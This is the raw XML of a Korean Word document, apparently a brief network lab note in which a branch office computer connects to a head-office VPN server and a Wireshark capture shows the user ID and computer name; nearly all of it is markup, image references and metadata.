            <wp:docPr id="127" name="그림 127" descr="https://lh4.googleusercontent.com/0Sandl5lAFv8U2nlQHmKE8ZtxUYZ52UWOUX2jzb6d4K3zKR2gS7xC8ZZB496sRc7IGIZ8qfYg0pdl16N5PXKwq4poZXuC1v-ZBf70A9RNqCtYO1N65ah_wBqQ5s82i9Yj2mb-F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lh4.googleusercontent.com/0Sandl5lAFv8U2nlQHmKE8ZtxUYZ52UWOUX2jzb6d4K3zKR2gS7xC8ZZB496sRc7IGIZ8qfYg0pdl16N5PXKwq4poZXuC1v-ZBf70A9RNqCtYO1N65ah_wBqQ5s82i9Yj2mb-FK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93620" cy="1783080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="128" name="그림 128" descr="https://lh6.googleusercontent.com/DqIDWSJLOZ4sGJU7KPNI6eQmo9X6XOAaGKC8212HQAzSC0VgtKHsEfi2joBaueAIMEDHqRoG7xQgYnTSJC8gFieyP5_0fo626jl0qjblASWrZ0Zhm51G9QO7nq52Y3uFoua_GN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lh6.googleusercontent.com/DqIDWSJLOZ4sGJU7KPNI6eQmo9X6XOAaGKC8212HQAzSC0VgtKHsEfi2joBaueAIMEDHqRoG7xQgYnTSJC8gFieyP5_0fo626jl0qjblASWrZ0Zhm51G9QO7nq52Y3uFoua_GN1Z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/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>지사의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컴퓨터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이용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본사</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에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접속</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5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579620" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="129" name="그림 129" descr="https://lh6.googleusercontent.com/fGKzU8KLdTfnKbRyY1z7qAogzLBxFtb84LMbOKR0eB_RB3BetE0ZDd7crHO62FQSIs59M9cLpqeZaa4XtuNZylTauUuELe9Z4f_BY_iIFI-B-mgU8_iI9lNSX7O11wOnRsX2x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lh6.googleusercontent.com/fGKzU8KLdTfnKbRyY1z7qAogzLBxFtb84LMbOKR0eB_RB3BetE0ZDd7crHO62FQSIs59M9cLpqeZaa4XtuNZylTauUuELe9Z4f_BY_iIFI-B-mgU8_iI9lNSX7O11wOnRsX2xOo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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ire Shark</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로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해보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아이디와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컴퓨터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이름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수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있음</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006024F5" w:rsidRPr="006024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51" w:rsidRDefault="001D4851" w:rsidP="00865A68">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001D4851" w:rsidRDefault="001D4851" w:rsidP="008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51" w:rsidRDefault="001D4851" w:rsidP="00865A68">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001D4851" w:rsidRDefault="001D4851" w:rsidP="0086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53CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94AAE91E"/>
    <w:lvl w:ilvl="0" w:tplc="C5E09F74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>
    <w:nsid w:val="02DD1384"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="216CABDA"/>
    <w:lvl w:ilvl="0" w:tplc="D7A09D3A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>
    <w:nsid w:val="039D5A30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8828EFAE"/>
    <w:lvl w:ilvl="0" w:tplc="4F1A3124">
      <w:start w:val="8"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="&gt;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3">
    <w:nsid w:val="0EAA5012"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B9AFD50"/>
    <w:lvl w:ilvl="0" w:tplc="B9A685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E637BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F496A932"/>
    <w:lvl w:ilvl="0" w:tplc="ACF82F9C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1C4E0546"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D82DDB0"/>
    <w:lvl w:ilvl="0" w:tplc="1084156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05F25AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DCEE307A"/>
    <w:lvl w:ilvl="0" w:tplc="5AB2DBF4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>
    <w:nsid w:val="240505F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41FA7FA0"/>
    <w:lvl w:ilvl="0" w:tplc="F7563194">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada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26DA3635"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8446050"/>
    <w:lvl w:ilvl="0" w:tplc="851E5EC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A296A75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B36853D8"/>
    <w:lvl w:ilvl="0" w:tplc="9BC66C72">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada"/>
      <w:lvlText w:val="%1.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0">
    <w:nsid w:val="3E83721A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E6CEB7E"/>
    <w:lvl w:ilvl="0" w:tplc="838AA93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4688030E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6E82668"/>
    <w:lvl w:ilvl="0" w:tplc="D416CCA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada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496D2DDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AED6D3BC"/>
    <w:lvl w:ilvl="0" w:tplc="05D0720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4">
    <w:nsid w:val="518C33BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4823B80"/>
    <w:lvl w:ilvl="0" w:tplc="C06EAF3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="184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>
    <w:nsid w:val="5DCE68FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD6EB264"/>
    <w:lvl w:ilvl="0" w:tplc="AA6A2C8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6178001A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1B64C36"/>
    <w:lvl w:ilvl="0" w:tplc="BB7895FE">
      <w:start w:val="8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>
    <w:nsid w:val="7C354B62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2063362"/>
    <w:lvl w:ilvl="0" w:tplc="BFE8AD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68"/>
    <w:rsid w:val="000404FC"/>
    <w:rsid w:val="00056274"/>
    <w:rsid w:val="0010076E"/>
    <w:rsid w:val="001D4851"/>
    <w:rsid w:val="00220989"/>
    <w:rsid w:val="0040771B"/>
    <w:rsid w:val="0048009A"/>
    <w:rsid w:val="004A2C87"/>
    <w:rsid w:val="004A79E9"/>
    <w:rsid w:val="005D4EB1"/>
    <w:rsid w:val="006024F5"/>
    <w:rsid w:val="007D6EE5"/>
    <w:rsid w:val="00802FA8"/>
    <w:rsid w:val="00865A68"/>
    <w:rsid w:val="008E3ABE"/>
    <w:rsid w:val="008F510A"/>
    <w:rsid w:val="009321F3"/>
    <w:rsid w:val="00965F61"/>
    <w:rsid w:val="00B609F1"/>
    <w:rsid w:val="00C73585"/>
    <w:rsid w:val="00CE3782"/>
    <w:rsid w:val="00CF524B"/>
    <w:rsid w:val="00D53EFE"/>
    <w:rsid w:val="00E16A17"/>
    <w:rsid w:val="00E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4AEB2-B1F4-492C-BF21-AA0577BC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A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5A68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865A68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865A68"/>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0086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7FA8-A0C6-41DD-8F97-44A1B14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HOME</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MY-HOME</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-26T03:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-27T09:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>